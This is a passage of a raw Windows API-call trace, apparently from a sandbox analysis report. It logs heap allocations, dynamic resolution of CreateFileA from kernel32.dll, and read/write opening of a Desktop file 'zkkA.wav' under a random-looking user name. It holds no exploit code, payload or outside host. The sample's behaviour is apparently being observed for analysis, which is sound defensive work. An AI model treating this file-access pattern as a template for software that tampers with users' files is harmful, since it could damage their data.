returned 0x8de218 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.483] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.486] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd438 [0168.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd438, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0168.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.487] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0168.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd438, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.487] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa6b008 [0168.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0168.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f) returned 0x9bf310 [0168.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav", cchWideChar=47, lpMultiByteStr=0x9bf310, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav", lpUsedDefaultChar=0x0) returned 47 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.489] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zkka.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=47, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5d78 [0168.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=47, lpWideCharStr=0x9a5d78, cchWideChar=47 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav") returned 47 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.493] 